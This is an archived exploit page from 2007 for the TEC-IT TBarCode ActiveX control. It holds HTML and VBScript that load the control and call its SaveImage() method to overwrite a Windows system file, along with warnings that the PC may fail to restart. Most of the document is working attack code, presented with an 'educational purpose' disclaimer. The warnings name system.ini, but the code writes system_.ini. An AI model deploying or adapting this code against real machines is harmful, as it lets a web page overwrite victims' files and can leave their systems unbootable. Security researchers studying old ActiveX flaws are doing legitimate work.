<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------------------
<b>TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite</b>
url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
-----------------------------------------------------------------------------------------------------------------
<object classid='clsid:D8541765-F6D2-4EE1-AEAA-4016BE1D9859' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
"Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
"THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
" OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
" SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
test.SaveImage "c:\windows\system_.ini", 1, 1, 1, 1, 1
MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"2007/05/21 - TEC-IT TBarCode")
Else
MyMsg = MsgBox ("Nice, be safe!", 64, "2007/05/21 - TEC-IT TBarCode")
End If
End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-06-12]